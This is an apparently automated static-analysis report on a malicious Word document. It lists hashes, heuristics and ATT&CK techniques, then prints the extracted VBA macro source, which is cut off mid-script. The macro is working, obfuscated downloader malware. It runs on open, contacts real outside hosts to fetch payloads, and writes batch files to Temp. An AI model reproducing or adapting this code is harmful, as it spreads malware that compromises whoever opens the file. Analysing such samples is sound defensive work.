Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86e3521c461e3cf3…

MALICIOUS

Office (OLE)

85.5 KB Created: 2015-06-16 07:19:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 2167796d53d60a72eb86e6f7b382852e SHA-1: bd4e0f3162f908cafff10f3c29cf12043be5bc1e SHA-256: 86e3521c461e3cf30ecd1949ac5dfde1ac4442283a26dc14754653a547c936a9
470 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of the Shell() function and obfuscation techniques, strongly suggesting the execution of a secondary payload. The Auto_Open macro is present, which is a common technique for executing malicious code upon document opening. The script attempts to construct a path for a temporary file and a URL, indicating a downloader functionality.

Heuristics 13

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36502 bytes
SHA-256: 8474872e35a014b78a5cba427c9fad3ec0c67e2dc319118085d50969e9f1de95
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub VYUQGWDhsagdasd_Open()
     
End Sub
Sub Auto_Open()
    Yhuqwdnwqjndqb
End Sub
Sub Bubwdhqbjhjabsd()
    NUQDNUWQHDWQU = "qihwdjkqwhejkw qhe jkqwh ejkqhw e"
End Sub
Sub Yhuqwdnwqjndqb()
    
    Dim asjiw As Integer, jwasssssdas As Integer, mmmilikeit As Integer, asdsssssjqwdq As Integer
    Dim huwe, auwd As Integer, aabbb As Integer
    Dim retVal As Variant
    Dim HPPSDJ As String
    
    YUGQYD = FRB.Ubqhwdhwqbd(16735)
    FL2 = YUGQYD
    HPPSDJ = "" + "" & "Te" + "mp" & ""
    PH2 = FRB.Bad(HPPSDJ) + "\"
    
    mmmilikeit = CInt(YUGQYD)
    jwnqdw = 1 - mmmilikeit
    
    
    JIQWDJQ = 12312312
    JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw)
    AAAA = JIQWDJQ
    
    HYWDAX = "bauwdhquwgdyquwdyuqwgd sjahdg ahsjdgat"
    JWIDJIAAA = ""
    HUYFEA = "uwdhqwiduihqwd"
    QIWJDABB = "b"
    HUYFEA = QIWJDABB + "a" + "t"
    IUQJWD = "qwljdlwqk"
    PSFL = FL2 + "" & "." + "p" + "" + Chr(115) _
    + _
    "1"
    
    '+ Right(HYWDAX, 1)
    SSS = Chr(AAAA + 1)
    VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
    huwe = 1
    BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
    
    INTG = "" & "o" & "bject"
    KIWD = Chr(110 + Sgn(Len(BAFL))) + "d" + "" + "ul" + "e"
    AFTG = "m" & KIWD
    
    SXEE = Chr(46)
    SXAA = Chr(101)
    SXE = SXEE & SXAA & "xe"
    GNG = ".png"
    
    PHT = "" & "ht" & "t" & "p://" & ""
    SPIC = "" & "" & "s" + "" & "av" & "epi" + "c.su" + Chr(47)
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = "bauqwhduiq hwgdhj dvbnsavd uqywgdq jwhdgwqd"
    ABPTH = PH2 + BAFL
    BAPTH = ABPTH
    
    Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer
    
    DRT = 315
    BFT = 316
    CFT = 317
    DFT = 318
    EFT = 319
    
    Dim PBIn As String, asdwq As String, MIWDWQ As String
    
    CDDD = "89172387.txt"
    LNSS = "lns.txt"
    STT1 = "dolphin2000.ir/tmp/"
    STT2 = "gnf.jotpee.de/tmp/"
    
    PBIn = PHT + STT1 + CDDD
    CONT = FRB.Kace(PBIn)
    asdwq = CONT
    
     HQUWDAAA = "0"
    If (asdwq = "") Then
        PBIn = PHT + STT2 + CDDD
        CONT = FRB.Kace(PBIn)
        asdwq = CONT
        HQUWDAAA = "1"
    End If
    
    CONT = FRB.Quqhwdbyas(asdwq)
     
    TVT10 = FRB.Port(CONT, "text10")
    TVT20 = FRB.Port(CONT, "text20")
    TVT21 = FRB.Port(CONT, "text21")
    TVT30 = FRB.Port(CONT, "text30")
    TVT31 = FRB.Port(CONT, "text31")
    XPT1 = FRB.Port(CONT, "stext1")
    XPT2 = FRB.Port(CONT, "stext2")
    XPT3 = FRB.Port(CONT, "stext3")
    
    
    WVR = FRB.Bad("USE" & "RPROFILE")
    UQHWDIHQW = "qwhdjkqwhdq dnasbdjnsbd kanm djkshdk"
    hufehu1 = InStr(WVR, "sers\")
    
    Dim hudhw As Integer
    Dim ghdAdd(1 To 3)
    ghdAdd(1) = "1"
    ghdAdd(2) = "0"
    ghdAdd(3) = "0"
    
    If (hufehu1 <> 0) Then
        ghdAdd(1) = "2"
    Else
        ghdAdd(2) = "3"
    End If
    
    JHWQUD = Join(ghdAdd)
    hudhw = Val(JHWQUD)
    
    FRB.WaitFor (1)
    
    MIWDWQ = PHT + STT1 + LNSS
    If (HQUWDAAA = "1") Then
        MIWDWQ = PHT + STT2 + LNSS
    End If
    
    SEXX = FRB.Kace(MIWDWQ)
    
    PSTB = PBIn + "123123123"
    MSTAR1 = SPIC + "7232078" + GNG
    MSTAR2 = SPIC + "7230030" + GNG
    STAR1 = PHT + MSTAR1
    STAR2 = PHT + MSTAR2
    FFQ = "8"
    FF = FFQ + SXE
    
     If (hudhw = 130) Then
     Open BAPTH For Output As #DRT
     Print #DRT, XPT1
     Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
     Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
     Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
     Print #DRT, XPT2
     Close #DRT
     
     FRB.WaitFor
... (truncated)